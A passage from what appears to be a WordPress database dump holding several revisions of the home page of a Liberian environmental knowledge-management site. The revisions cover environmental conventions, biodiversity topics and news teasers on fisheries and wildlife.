<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-18 14:40:11','2021-08-18 14:40:11','',9,'https://ekmsliberia.info/?p=4075',0,'revision','',0),(4076,38,'2021-08-18 14:40:11','2021-08-18 14:40:11','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-18 14:40:11','2021-08-18 14:40:11','',9,'https://ekmsliberia.info/?p=4076',0,'revision','',0),(4077,38,'2021-08-18 14:40:12','2021-08-18 14:40:12','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-18 14:40:12','2021-08-18 14:40:12','',9,'https://ekmsliberia.info/?p=4077',0,'revision','',0),(4078,38,'2021-08-18 14:43:20','2021-08-18 14:43:20','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-18 14:43:20','2021-08-18 14:43:20','',9,'https://ekmsliberia.info/?p=4078',0,'revision','',0),(4079,38,'2021-08-18 14:43:20','2021-08-18 14:43:20','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a 